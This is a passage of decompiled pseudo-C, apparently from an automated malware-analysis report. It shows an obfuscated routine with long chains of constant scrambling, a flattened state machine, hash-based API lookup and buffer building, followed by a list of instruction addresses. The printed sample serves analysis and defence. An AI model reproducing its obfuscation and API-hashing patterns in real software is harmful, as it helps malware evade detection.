                                                                                                                                                                                      				_v388 = _v388 ^ 0x00cb1c88;
                                                                                                                                                                                      				_v524 = 0xb2cc76;
                                                                                                                                                                                      				_v524 = _v524 + 0x9146;
                                                                                                                                                                                      				_v524 = _v524 + 0xffffbb7f;
                                                                                                                                                                                      				_v524 = _v524 ^ 0x8c867547;
                                                                                                                                                                                      				_v524 = _v524 ^ 0x8c346e6b;
                                                                                                                                                                                      				_v412 = 0xfc8e04;
                                                                                                                                                                                      				_v412 = _v412 >> 8;
                                                                                                                                                                                      				_t774 = 0x71;
                                                                                                                                                                                      				_v412 = _v412 * 0x3a;
                                                                                                                                                                                      				_v412 = _v412 ^ 0x00372199;
                                                                                                                                                                                      				_v444 = 0xfa5ff8;
                                                                                                                                                                                      				_v444 = _v444 ^ 0x860f3dec;
                                                                                                                                                                                      				_v444 = _v444 << 0x10;
                                                                                                                                                                                      				_v444 = _v444 ^ 0x621f63b2;
                                                                                                                                                                                      				_v328 = 0xb2bda6;
                                                                                                                                                                                      				_v328 = _v328 | 0xd21dda15;
                                                                                                                                                                                      				_v328 = _v328 ^ 0xd2bc271a;
                                                                                                                                                                                      				_v548 = 0x3b49b6;
                                                                                                                                                                                      				_v548 = _v548 >> 0xb;
                                                                                                                                                                                      				_v548 = _v548 + 0xbb3e;
                                                                                                                                                                                      				_v548 = _v548 + 0xffff56dd;
                                                                                                                                                                                      				_v548 = _v548 ^ 0x000cff07;
                                                                                                                                                                                      				_v456 = 0x565647;
                                                                                                                                                                                      				_v456 = _v456 + 0xf716;
                                                                                                                                                                                      				_v456 = _v456 + 0x3321;
                                                                                                                                                                                      				_v456 = _v456 ^ 0x00583957;
                                                                                                                                                                                      				_v492 = 0xbb53b3;
                                                                                                                                                                                      				_v492 = _v492 / _t774;
                                                                                                                                                                                      				_v492 = _v492 >> 0xa;
                                                                                                                                                                                      				_v492 = _v492 >> 0xf;
                                                                                                                                                                                      				_v492 = _v492 ^ 0x0002bbd3;
                                                                                                                                                                                      				_v380 = 0x5ea3ed;
                                                                                                                                                                                      				_t775 = 0x12;
                                                                                                                                                                                      				_v380 = _v380 / _t775;
                                                                                                                                                                                      				_v380 = _v380 ^ 0x0002b3f6;
                                                                                                                                                                                      				_v428 = 0xc5e382;
                                                                                                                                                                                      				_v428 = _v428 + 0x10b;
                                                                                                                                                                                      				_v428 = _v428 * 0x3d;
                                                                                                                                                                                      				_v428 = _v428 ^ 0x2f2d31ce;
                                                                                                                                                                                      				_v384 = 0x7e50f1;
                                                                                                                                                                                      				_v384 = _v384 + 0xffffd7b9;
                                                                                                                                                                                      				_v384 = _v384 ^ 0x4dd639cf;
                                                                                                                                                                                      				_v384 = _v384 ^ 0x4da37294;
                                                                                                                                                                                      				_v516 = 0x676c72;
                                                                                                                                                                                      				_t776 = 0x48;
                                                                                                                                                                                      				_v516 = _v516 / _t776;
                                                                                                                                                                                      				_v516 = _v516 << 0xb;
                                                                                                                                                                                      				_t777 = 0x77;
                                                                                                                                                                                      				_v516 = _v516 * 0x33;
                                                                                                                                                                                      				_v516 = _v516 ^ 0x4a114b66;
                                                                                                                                                                                      				_v440 = 0x7c8da1;
                                                                                                                                                                                      				_v440 = _v440 + 0x76bb;
                                                                                                                                                                                      				_v440 = _v440 + 0xffffa3ac;
                                                                                                                                                                                      				_v440 = _v440 ^ 0x0070fb01;
                                                                                                                                                                                      				_v448 = 0xff25f5;
                                                                                                                                                                                      				_v448 = _v448 / _t777;
                                                                                                                                                                                      				_v448 = _v448 << 8;
                                                                                                                                                                                      				_v448 = _v448 ^ 0x0224052d;
                                                                                                                                                                                      				_v544 = 0xf7834f;
                                                                                                                                                                                      				_v544 = _v544 << 0xf;
                                                                                                                                                                                      				_v544 = _v544 + 0xbbb1;
                                                                                                                                                                                      				_v544 = _v544 | 0x06550611;
                                                                                                                                                                                      				_v544 = _v544 ^ 0xc7f9d9cf;
                                                                                                                                                                                      				_v484 = 0xc145f2;
                                                                                                                                                                                      				_v484 = _v484 | 0x1a332a8f;
                                                                                                                                                                                      				_v484 = _v484 + 0xffff0278;
                                                                                                                                                                                      				_v484 = _v484 ^ 0x1af43a4d;
                                                                                                                                                                                      				_v312 = 0x4b1d29;
                                                                                                                                                                                      				_v312 = _v312 >> 2;
                                                                                                                                                                                      				_v312 = _v312 ^ 0x00177a04;
                                                                                                                                                                                      				_v336 = 0x360ace;
                                                                                                                                                                                      				_v336 = _v336 ^ 0xc80cb5e9;
                                                                                                                                                                                      				_v336 = _v336 ^ 0xc839ddc7;
                                                                                                                                                                                      				_v528 = 0xc44b32;
                                                                                                                                                                                      				_v528 = _v528 | 0x4383368e;
                                                                                                                                                                                      				_v528 = _v528 ^ 0x03d39e25;
                                                                                                                                                                                      				_v528 = _v528 ^ 0x53d26fc1;
                                                                                                                                                                                      				_v528 = _v528 ^ 0x13cfd90c;
                                                                                                                                                                                      				_v536 = 0xc858c;
                                                                                                                                                                                      				_t778 = 0x1a;
                                                                                                                                                                                      				_v536 = _v536 * 0xa;
                                                                                                                                                                                      				_v536 = _v536 | 0x3f6cb10e;
                                                                                                                                                                                      				_v536 = _v536 + 0x8b75;
                                                                                                                                                                                      				_v536 = _v536 ^ 0x3f749682;
                                                                                                                                                                                      				_v372 = 0xe3b868;
                                                                                                                                                                                      				_v372 = _v372 >> 0xb;
                                                                                                                                                                                      				_v372 = _v372 ^ 0x000877a5;
                                                                                                                                                                                      				_v520 = 0x43f6c5;
                                                                                                                                                                                      				_v520 = _v520 ^ 0xab5b9b7f;
                                                                                                                                                                                      				_v520 = _v520 / _t778;
                                                                                                                                                                                      				_v520 = _v520 | 0x87a4b1c4;
                                                                                                                                                                                      				_v520 = _v520 ^ 0x87bb68a1;
                                                                                                                                                                                      				_v376 = 0xa66ec3;
                                                                                                                                                                                      				_v376 = _v376 | 0x8d13b12a;
                                                                                                                                                                                      				_v376 = _v376 ^ 0x8dbc5e75;
                                                                                                                                                                                      				_v452 = 0xb2761d;
                                                                                                                                                                                      				_v452 = _v452 | 0x8e13417f;
                                                                                                                                                                                      				_v452 = _v452 >> 4;
                                                                                                                                                                                      				_v452 = _v452 ^ 0x08ea57ac;
                                                                                                                                                                                      				_v420 = 0x566571;
                                                                                                                                                                                      				_v420 = _v420 + 0x92bf;
                                                                                                                                                                                      				_v420 = _v420 >> 0x10;
                                                                                                                                                                                      				_v420 = _v420 ^ 0x000d4db7;
                                                                                                                                                                                      				_v508 = 0xacfdd3;
                                                                                                                                                                                      				_v508 = _v508 | 0x5370955f;
                                                                                                                                                                                      				_t779 = 0x4a;
                                                                                                                                                                                      				_v508 = _v508 / _t779;
                                                                                                                                                                                      				_v508 = _v508 << 0xe;
                                                                                                                                                                                      				_v508 = _v508 ^ 0xa37f5948;
                                                                                                                                                                                      				_v532 = 0x5b36aa;
                                                                                                                                                                                      				_t780 = 0x66;
                                                                                                                                                                                      				_v532 = _v532 / _t780;
                                                                                                                                                                                      				_v532 = _v532 + 0x9645;
                                                                                                                                                                                      				_v532 = _v532 + 0x7571;
                                                                                                                                                                                      				_v532 = _v532 ^ 0x000463d2;
                                                                                                                                                                                      				_v460 = 0xcd536;
                                                                                                                                                                                      				_v460 = _v460 | 0xa48cf865;
                                                                                                                                                                                      				_t781 = 0x3c;
                                                                                                                                                                                      				_v460 = _v460 * 0x73;
                                                                                                                                                                                      				_v460 = _v460 ^ 0xeb561116;
                                                                                                                                                                                      				_v360 = 0xd5dba;
                                                                                                                                                                                      				_v360 = _v360 / _t781;
                                                                                                                                                                                      				_v360 = _v360 ^ 0x00005c14;
                                                                                                                                                                                      				_v404 = 0xa212a4;
                                                                                                                                                                                      				_v404 = _v404 | 0x58704cfe;
                                                                                                                                                                                      				_t782 = 0x60;
                                                                                                                                                                                      				_v404 = _v404 / _t782;
                                                                                                                                                                                      				_v404 = _v404 ^ 0x00e6e781;
                                                                                                                                                                                      				_v500 = 0x3c0644;
                                                                                                                                                                                      				_v500 = _v500 << 2;
                                                                                                                                                                                      				_t690 = 0x58;
                                                                                                                                                                                      				_v500 = _v500 / _t690;
                                                                                                                                                                                      				_t783 = 0x6d;
                                                                                                                                                                                      				_v500 = _v500 / _t783;
                                                                                                                                                                                      				_v500 = _v500 ^ 0x00078705;
                                                                                                                                                                                      				_v468 = 0xa3c72f;
                                                                                                                                                                                      				_v468 = _v468 * 0x48;
                                                                                                                                                                                      				_v468 = _v468 ^ 0xb2004da4;
                                                                                                                                                                                      				_v468 = _v468 ^ 0x9c15ecbc;
                                                                                                                                                                                      				_v344 = 0xe572d1;
                                                                                                                                                                                      				_v344 = _v344 >> 0xc;
                                                                                                                                                                                      				_v344 = _v344 ^ 0x0006c657;
                                                                                                                                                                                      				_v436 = 0xf66be8;
                                                                                                                                                                                      				_v436 = _v436 + 0xffff754a;
                                                                                                                                                                                      				_v436 = _v436 | 0xbfbde8c6;
                                                                                                                                                                                      				_v436 = _v436 ^ 0xbff52719;
                                                                                                                                                                                      				_v476 = 0x9cf726;
                                                                                                                                                                                      				_v476 = _v476 | 0xf4405671;
                                                                                                                                                                                      				_v476 = _v476 << 8;
                                                                                                                                                                                      				_v476 = _v476 ^ 0xdcf65da8;
                                                                                                                                                                                      				_v396 = 0xb1198c;
                                                                                                                                                                                      				_v396 = _v396 | 0x5afbbeef;
                                                                                                                                                                                      				_v396 = _v396 ^ 0x5af84ad6;
                                                                                                                                                                                      				_v556 = 0xa069a;
                                                                                                                                                                                      				_v556 = _v556 + 0xffff3d5d;
                                                                                                                                                                                      				_v556 = _v556 | 0xabf4caf6;
                                                                                                                                                                                      				_v556 = _v556 * 0x66;
                                                                                                                                                                                      				_v556 = _v556 ^ 0x871ad044;
                                                                                                                                                                                      				_v320 = 0xeddd1e;
                                                                                                                                                                                      				_v320 = _v320 + 0xffff6c47;
                                                                                                                                                                                      				_v320 = _v320 ^ 0x00e224c3;
                                                                                                                                                                                      				_v552 = 0xa16b02;
                                                                                                                                                                                      				_v552 = _v552 >> 0xf;
                                                                                                                                                                                      				_v552 = _v552 << 4;
                                                                                                                                                                                      				_v552 = _v552 ^ 0x54d73f19;
                                                                                                                                                                                      				_v552 = _v552 ^ 0x54d75985;
                                                                                                                                                                                      				_v464 = 0xdf0941;
                                                                                                                                                                                      				_v464 = _v464 + 0xcb8c;
                                                                                                                                                                                      				_v464 = _v464 >> 9;
                                                                                                                                                                                      				_v464 = _v464 ^ 0x00056a58;
                                                                                                                                                                                      				_v472 = 0xcffc0b;
                                                                                                                                                                                      				_v472 = _v472 + _t799;
                                                                                                                                                                                      				_v472 = _v472 ^ 0xefa8c7c3;
                                                                                                                                                                                      				_v472 = _v472 ^ 0xef6bd9c6;
                                                                                                                                                                                      				_v324 = 0x489401;
                                                                                                                                                                                      				_v324 = _v324 + 0x2f52;
                                                                                                                                                                                      				_v324 = _v324 ^ 0x00492e44;
                                                                                                                                                                                      				_v368 = 0xd20175;
                                                                                                                                                                                      				_v368 = _v368 ^ 0x642ec617;
                                                                                                                                                                                      				_v368 = _v368 ^ 0x64f7b4e7;
                                                                                                                                                                                      				_v540 = 0xdf2574;
                                                                                                                                                                                      				_v540 = _v540 << 0xb;
                                                                                                                                                                                      				_v540 = _v540 >> 3;
                                                                                                                                                                                      				_t784 = 0x34;
                                                                                                                                                                                      				_v540 = _v540 / _t784;
                                                                                                                                                                                      				_v540 = _v540 ^ 0x00965a73;
                                                                                                                                                                                      				_v316 = 0xede385;
                                                                                                                                                                                      				_v316 = _v316 << 2;
                                                                                                                                                                                      				_v316 = _v316 ^ 0x03ba3859;
                                                                                                                                                                                      				_v512 = 0x14522c;
                                                                                                                                                                                      				_t785 = 0x29;
                                                                                                                                                                                      				_v512 = _v512 / _t785;
                                                                                                                                                                                      				_v512 = _v512 + 0xfffff241;
                                                                                                                                                                                      				_v512 = _v512 | 0x236c33b5;
                                                                                                                                                                                      				_v512 = _v512 ^ 0x236845c9;
                                                                                                                                                                                      				_v348 = 0x5f65e8;
                                                                                                                                                                                      				_v348 = _v348 ^ 0x05ce3e22;
                                                                                                                                                                                      				_v348 = _v348 ^ 0x059645b8;
                                                                                                                                                                                      				_v408 = 0xe58394;
                                                                                                                                                                                      				_v408 = _v408 + 0xe0f7;
                                                                                                                                                                                      				_t786 = 0x52;
                                                                                                                                                                                      				_v408 = _v408 / _t786;
                                                                                                                                                                                      				_v408 = _v408 ^ 0x000db681;
                                                                                                                                                                                      				_v496 = 0x46a785;
                                                                                                                                                                                      				_v496 = _v496 ^ 0x49997b83;
                                                                                                                                                                                      				_v496 = _v496 + 0xffff3964;
                                                                                                                                                                                      				_v496 = _v496 << 0xe;
                                                                                                                                                                                      				_v496 = _v496 ^ 0xc55c07fb;
                                                                                                                                                                                      				_v504 = 0xc28d72;
                                                                                                                                                                                      				_v504 = _v504 / _t690;
                                                                                                                                                                                      				_v504 = _v504 << 0xc;
                                                                                                                                                                                      				_v504 = _v504 >> 9;
                                                                                                                                                                                      				_v504 = _v504 ^ 0x00189682;
                                                                                                                                                                                      				_v340 = 0x971023;
                                                                                                                                                                                      				_t787 = 0x3f;
                                                                                                                                                                                      				_v340 = _v340 / _t787;
                                                                                                                                                                                      				_v340 = _v340 ^ 0x0007e653;
                                                                                                                                                                                      				_v480 = 0x5ee1b;
                                                                                                                                                                                      				_v480 = _v480 ^ 0x94dca5bc;
                                                                                                                                                                                      				_v480 = _v480 + 0xa3cd;
                                                                                                                                                                                      				_v480 = _v480 ^ 0x94db08db;
                                                                                                                                                                                      				_v392 = 0xf65325;
                                                                                                                                                                                      				_v392 = _v392 + 0xe39f;
                                                                                                                                                                                      				_v392 = _v392 >> 0xa;
                                                                                                                                                                                      				_v392 = _v392 ^ 0x000af9f4;
                                                                                                                                                                                      				_v400 = 0xbac066;
                                                                                                                                                                                      				_v400 = _v400 ^ 0xd78d05c4;
                                                                                                                                                                                      				_v400 = _v400 >> 0xb;
                                                                                                                                                                                      				_v400 = _v400 ^ 0x001d17a0;
                                                                                                                                                                                      				_v356 = 0x9ce01f;
                                                                                                                                                                                      				_v356 = _v356 | 0xeb61c9d9;
                                                                                                                                                                                      				_v356 = _v356 ^ 0xebf5013f;
                                                                                                                                                                                      				_v416 = 0x59bba4;
                                                                                                                                                                                      				_v416 = _v416 + 0xffffa4e4;
                                                                                                                                                                                      				_v416 = _v416 + 0xffff160d;
                                                                                                                                                                                      				_v416 = _v416 ^ 0x0052dc60;
                                                                                                                                                                                      				_t691 = _v304;
                                                                                                                                                                                      				_t800 = _v304;
                                                                                                                                                                                      				_v424 = 0xb9ecd0;
                                                                                                                                                                                      				_v424 = _v424 * 0x33;
                                                                                                                                                                                      				_v424 = _v424 * 0x48;
                                                                                                                                                                                      				_v424 = _v424 ^ 0x6ad5bf37;
                                                                                                                                                                                      				_v364 = 0x5d0977;
                                                                                                                                                                                      				_v364 = _v364 ^ 0xa81ddbfb;
                                                                                                                                                                                      				_v364 = _v364 ^ 0xa8418dcc;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							L2:
                                                                                                                                                                                      							_t807 = _t793 - 0x4450dbe;
                                                                                                                                                                                      							if(_t807 > 0) {
                                                                                                                                                                                      								break;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(_t807 == 0) {
                                                                                                                                                                                      								_t789 = 0x4000;
                                                                                                                                                                                      								_push(_t696);
                                                                                                                                                                                      								_t648 = E003E6F53(0x4000);
                                                                                                                                                                                      								_v308 = _t648;
                                                                                                                                                                                      								__eflags = _t648;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									return _t648;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t793 = 0x130c6e5;
                                                                                                                                                                                      								L11:
                                                                                                                                                                                      								_t696 = _v488;
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									L1:
                                                                                                                                                                                      									goto L2;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(_t793 == 0x130c6e5) {
                                                                                                                                                                                      								_push(0x3d17d4);
                                                                                                                                                                                      								_t649 = E003F0AD3(_v508, _v532, __eflags);
                                                                                                                                                                                      								_push( &_v256);
                                                                                                                                                                                      								_push(_t649);
                                                                                                                                                                                      								_push(_t789);
                                                                                                                                                                                      								_push(_v308);
                                                                                                                                                                                      								 *((intOrPtr*)(E003DDFB1(0xae2a7e8d, 0x13a)))();
                                                                                                                                                                                      								E003E2EED(_v460, _v360, _v404, _t649);
                                                                                                                                                                                      								_t801 =  &(_t801[6]);
                                                                                                                                                                                      								_t793 = 0x1af53ca;
                                                                                                                                                                                      								goto L11;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(_t793 == 0x13fc339) {
                                                                                                                                                                                      								E003DF699(_v356, _v308, _v416, _v424, _v364);
                                                                                                                                                                                      								return 0;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(_t793 == 0x1af53ca) {
                                                                                                                                                                                      								_t789 = _t789 +  *((intOrPtr*)(_t696 + 4));
                                                                                                                                                                                      								_push(_t696);
                                                                                                                                                                                      								_t800 = E003E6F53(_t789);
                                                                                                                                                                                      								__eflags = _t800;
                                                                                                                                                                                      								_t645 = 0xd5662cb;
                                                                                                                                                                                      								_t696 = _v488;
                                                                                                                                                                                      								_t793 =  !=  ? 0xd5662cb : 0x13fc339;
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(_t793 == 0x34ad1e7) {
                                                                                                                                                                                      								E003E4626( *_t696,  *((intOrPtr*)(_t696 + 4)), _t691, _v324, _v368, _v540, _v316);
                                                                                                                                                                                      								_t696 = _v488;
                                                                                                                                                                                      								_t801 =  &(_t801[5]);
                                                                                                                                                                                      								_t793 = 0xeed25b2;
                                                                                                                                                                                      								_t691 = _t691 +  *((intOrPtr*)(_t696 + 4));
                                                                                                                                                                                      								goto L1;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(_t793 != 0x375e34a) {
                                                                                                                                                                                      								goto L31;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_push(_t696);
                                                                                                                                                                                      							_push(4);
                                                                                                                                                                                      							_push(_t696);
                                                                                                                                                                                      							_push(_t696);
                                                                                                                                                                                      							_t708 = 0x10;
                                                                                                                                                                                      							_t789 = E003E2CCF(_t708);
                                                                                                                                                                                      							_push( &_v128);
                                                                                                                                                                                      							_push(_v516);
                                                                                                                                                                                      							_push(_t789);
                                                                                                                                                                                      							_push(0xb);
                                                                                                                                                                                      							E003E8601(_v428, _v384);
                                                                                                                                                                                      							_t793 = 0x79ecab0;
                                                                                                                                                                                      							L10:
                                                                                                                                                                                      							_t801 =  &(_t801[8]);
                                                                                                                                                                                      							goto L11;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t793 - 0x79ecab0;
                                                                                                                                                                                      						if(_t793 == 0x79ecab0) {
                                                                                                                                                                                      							_t794 =  &_v256;
                                                                                                                                                                                      							_push(_t696);
                                                                                                                                                                                      							_push(8);
                                                                                                                                                                                      							_push(_t696);
                                                                                                                                                                                      							_push(_t696);
                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                      							_pop(0);
                                                                                                                                                                                      							_t756 = E003E2CCF(0);
                                                                                                                                                                                      							_t802 =  &(_t801[4]);
                                                                                                                                                                                      							_t638 = _v432;
                                                                                                                                                                                      							__eflags = _t638 - _t756;
                                                                                                                                                                                      							if(_t638 < _t756) {
                                                                                                                                                                                      								_t773 = _t756 - _t638;
                                                                                                                                                                                      								_t790 = _t794;
                                                                                                                                                                                      								_t719 = _t773 >> 1;
                                                                                                                                                                                      								__eflags = _t719;
                                                                                                                                                                                      								_t688 = memset(_t790, 0x2d002d, _t719 << 2);
                                                                                                                                                                                      								asm("adc ecx, ecx");
                                                                                                                                                                                      								_t794 = _t794 + _t773 * 2;
                                                                                                                                                                                      								memset(_t790 + _t719, _t688, 0);
                                                                                                                                                                                      								_t802 =  &(_t802[6]);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                      							_push(8);
                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                      							_t698 = 0x10;
                                                                                                                                                                                      							_t643 = E003E2CCF(_t698);
                                                                                                                                                                                      							_push(_t794);
                                                                                                                                                                                      							_push(_v376);
                                                                                                                                                                                      							_t789 = _t643;
                                                                                                                                                                                      							_push(_t789);
                                                                                                                                                                                      							_push(0xb);
                                                                                                                                                                                      							E003E8601(_v372, _v520);
                                                                                                                                                                                      							_t696 = _v488;
                                                                                                                                                                                      							_t801 =  &(_t802[8]);
                                                                                                                                                                                      							_t793 = 0x4450dbe;
                                                                                                                                                                                      							_t645 = 0xd5662cb;
                                                                                                                                                                                      							goto L31;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t793 - 0xc3ba346;
                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                      							_t793 = 0xeb2477a;
                                                                                                                                                                                      							goto L2;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t793 - _t645;
                                                                                                                                                                                      						if(_t793 == _t645) {
                                                                                                                                                                                      							_push(0x3d1824);
                                                                                                                                                                                      							_v300 = _t789 + _t800;
                                                                                                                                                                                      							_t691 = E003DE20F( &_v128, __eflags,  &_v288, _t789 + _t800 - _t800, _v476,  &_v256, E003D54C0(_v344, _v436), _v396, _v556, _v320) + _t800;
                                                                                                                                                                                      							E003E2EED(_v552, _v464, _v472, _t668);
                                                                                                                                                                                      							_t801 =  &(_t801[0xb]);
                                                                                                                                                                                      							_t793 = 0x34ad1e7;
                                                                                                                                                                                      							goto L11;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t793 - 0xeb2477a;
                                                                                                                                                                                      						if(_t793 == 0xeb2477a) {
                                                                                                                                                                                      							_push(_t696);
                                                                                                                                                                                      							_push(1);
                                                                                                                                                                                      							_push(_t696);
                                                                                                                                                                                      							_push(_t696);
                                                                                                                                                                                      							_t713 = 8;
                                                                                                                                                                                      							_t789 = E003E2CCF(_t713);
                                                                                                                                                                                      							_push( &_v288);
                                                                                                                                                                                      							_push(_v328);
                                                                                                                                                                                      							_push(_t789);
                                                                                                                                                                                      							_push(9);
                                                                                                                                                                                      							E003E8601(_v412, _v444);
                                                                                                                                                                                      							_t793 = 0x375e34a;
                                                                                                                                                                                      							goto L10;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t793 - 0xeed25b2;
                                                                                                                                                                                      						if(_t793 != 0xeed25b2) {
                                                                                                                                                                                      							goto L31;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push(0x3d1774);
                                                                                                                                                                                      						_t684 = E003EC103(_v496, __eflags, _v504, _t691,  &_v256, _v340, E003D54C0(_v512, _v348), _v300 - _t691);
                                                                                                                                                                                      						E003E2EED(_v480, _v392, _v400, _t680);
                                                                                                                                                                                      						_t686 = _v304;
                                                                                                                                                                                      						_t695 = _t691 + _t684 - _t800;
                                                                                                                                                                                      						__eflags = _t695;
                                                                                                                                                                                      						 *_t686 = _t800;
                                                                                                                                                                                      						 *(_t686 + 4) = _t695;
                                                                                                                                                                                      						L23:
                                                                                                                                                                                      						return _v308;
                                                                                                                                                                                      						L31:
                                                                                                                                                                                      						__eflags = _t793 - 0x824eb52;
                                                                                                                                                                                      					} while (__eflags != 0);
                                                                                                                                                                                      					goto L23;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}


















































































































                                                                                                                                                                                      0x003ed5fe
                                                                                                                                                                                      0x003ed5fe
                                                                                                                                                                                      0x003ed604
                                                                                                                                                                                      0x003ed60c
                                                                                                                                                                                      0x003ed617
                                                                                                                                                                                      0x003ed61f
                                                                                                                                                                                      0x003ed627
                                                                                                                                                                                      0x003ed62f
                                                                                                                                                                                      0x003ed637
                                                                                                                                                                                      0x003ed642
                                                                                                                                                                                      0x003ed64d
                                                                                                                                                                                      0x003ed658
                                                                                                                                                                                      0x003ed66e
                                                                                                                                                                                      0x003ed675
                                                                                                                                                                                      0x003ed67e
                                                                                                                                                                                      0x003ed682
                                                                                                                                                                                      0x003ed687
                                                                                                                                                                                      0x003ed690
                                                                                                                                                                                      0x003ed69b
                                                                                                                                                                                      0x003ed6a6
                                                                                                                                                                                      0x003ed6b1
                                                                                                                                                                                      0x003ed6bc
                                                                                                                                                                                      0x003ed6c7
                                                                                                                                                                                      0x003ed6cf
                                                                                                                                                                                      0x003ed6d7
                                                                                                                                                                                      0x003ed6df
                                                                                                                                                                                      0x003ed6e7
                                                                                                                                                                                      0x003ed6ef
                                                                                                                                                                                      0x003ed6fa
                                                                                                                                                                                      0x003ed70a
                                                                                                                                                                                      0x003ed70d
                                                                                                                                                                                      0x003ed714
                                                                                                                                                                                      0x003ed71f
                                                                                                                                                                                      0x003ed72a
                                                                                                                                                                                      0x003ed735
                                                                                                                                                                                      0x003ed73d
                                                                                                                                                                                      0x003ed748
                                                                                                                                                                                      0x003ed753
                                                                                                                                                                                      0x003ed75e
                                                                                                                                                                                      0x003ed769
                                                                                                                                                                                      0x003ed771
                                                                                                                                                                                      0x003ed776
                                                                                                                                                                                      0x003ed77e
                                                                                                                                                                                      0x003ed786
                                                                                                                                                                                      0x003ed78e
                                                                                                                                                                                      0x003ed796
                                                                                                                                                                                      0x003ed79e
                                                                                                                                                                                      0x003ed7a6
                                                                                                                                                                                      0x003ed7ae
                                                                                                                                                                                      0x003ed7be
                                                                                                                                                                                      0x003ed7c2
                                                                                                                                                                                      0x003ed7c7
                                                                                                                                                                                      0x003ed7cc
                                                                                                                                                                                      0x003ed7d4
                                                                                                                                                                                      0x003ed7e6
                                                                                                                                                                                      0x003ed7e9
                                                                                                                                                                                      0x003ed7f0
                                                                                                                                                                                      0x003ed7fb
                                                                                                                                                                                      0x003ed806
                                                                                                                                                                                      0x003ed819
                                                                                                                                                                                      0x003ed820
                                                                                                                                                                                      0x003ed82b
                                                                                                                                                                                      0x003ed836
                                                                                                                                                                                      0x003ed841
                                                                                                                                                                                      0x003ed84c
                                                                                                                                                                                      0x003ed857
                                                                                                                                                                                      0x003ed867
                                                                                                                                                                                      0x003ed86c
                                                                                                                                                                                      0x003ed872
                                                                                                                                                                                      0x003ed87c
                                                                                                                                                                                      0x003ed87f
                                                                                                                                                                                      0x003ed883
                                                                                                                                                                                      0x003ed88b
                                                                                                                                                                                      0x003ed896
                                                                                                                                                                                      0x003ed8a1
                                                                                                                                                                                      0x003ed8ac
                                                                                                                                                                                      0x003ed8b7
                                                                                                                                                                                      0x003ed8cd
                                                                                                                                                                                      0x003ed8d4
                                                                                                                                                                                      0x003ed8dc
                                                                                                                                                                                      0x003ed8e7
                                                                                                                                                                                      0x003ed8ef
                                                                                                                                                                                      0x003ed8f4
                                                                                                                                                                                      0x003ed8fc
                                                                                                                                                                                      0x003ed904
                                                                                                                                                                                      0x003ed90c
                                                                                                                                                                                      0x003ed914
                                                                                                                                                                                      0x003ed91c
                                                                                                                                                                                      0x003ed924
                                                                                                                                                                                      0x003ed92c
                                                                                                                                                                                      0x003ed937
                                                                                                                                                                                      0x003ed93f
                                                                                                                                                                                      0x003ed94a
                                                                                                                                                                                      0x003ed955
                                                                                                                                                                                      0x003ed960
                                                                                                                                                                                      0x003ed96b
                                                                                                                                                                                      0x003ed973
                                                                                                                                                                                      0x003ed97b
                                                                                                                                                                                      0x003ed983
                                                                                                                                                                                      0x003ed98b
                                                                                                                                                                                      0x003ed993
                                                                                                                                                                                      0x003ed9a0
                                                                                                                                                                                      0x003ed9a3
                                                                                                                                                                                      0x003ed9a7
                                                                                                                                                                                      0x003ed9af
                                                                                                                                                                                      0x003ed9b7
                                                                                                                                                                                      0x003ed9bf
                                                                                                                                                                                      0x003ed9ca
                                                                                                                                                                                      0x003ed9d2
                                                                                                                                                                                      0x003ed9dd
                                                                                                                                                                                      0x003ed9e5
                                                                                                                                                                                      0x003ed9f5
                                                                                                                                                                                      0x003ed9f9
                                                                                                                                                                                      0x003eda01
                                                                                                                                                                                      0x003eda09
                                                                                                                                                                                      0x003eda14
                                                                                                                                                                                      0x003eda1f
                                                                                                                                                                                      0x003eda2a
                                                                                                                                                                                      0x003eda32
                                                                                                                                                                                      0x003eda3a
                                                                                                                                                                                      0x003eda3f
                                                                                                                                                                                      0x003eda47
                                                                                                                                                                                      0x003eda52
                                                                                                                                                                                      0x003eda5d
                                                                                                                                                                                      0x003eda65
                                                                                                                                                                                      0x003eda70
                                                                                                                                                                                      0x003eda78
                                                                                                                                                                                      0x003eda84
                                                                                                                                                                                      0x003eda87
                                                                                                                                                                                      0x003eda8d
                                                                                                                                                                                      0x003eda92
                                                                                                                                                                                      0x003eda9a
                                                                                                                                                                                      0x003edaa8
                                                                                                                                                                                      0x003edaad
                                                                                                                                                                                      0x003edab3
                                                                                                                                                                                      0x003edabb
                                                                                                                                                                                      0x003edac3
                                                                                                                                                                                      0x003edacb
                                                                                                                                                                                      0x003edad3
                                                                                                                                                                                      0x003edae0
                                                                                                                                                                                      0x003edae3
                                                                                                                                                                                      0x003edae7
                                                                                                                                                                                      0x003edaef
                                                                                                                                                                                      0x003edb05
                                                                                                                                                                                      0x003edb0c
                                                                                                                                                                                      0x003edb17
                                                                                                                                                                                      0x003edb22
                                                                                                                                                                                      0x003edb34
                                                                                                                                                                                      0x003edb39
                                                                                                                                                                                      0x003edb42
                                                                                                                                                                                      0x003edb4d
                                                                                                                                                                                      0x003edb55
                                                                                                                                                                                      0x003edb5e
                                                                                                                                                                                      0x003edb63
                                                                                                                                                                                      0x003edb6d
                                                                                                                                                                                      0x003edb70
                                                                                                                                                                                      0x003edb74
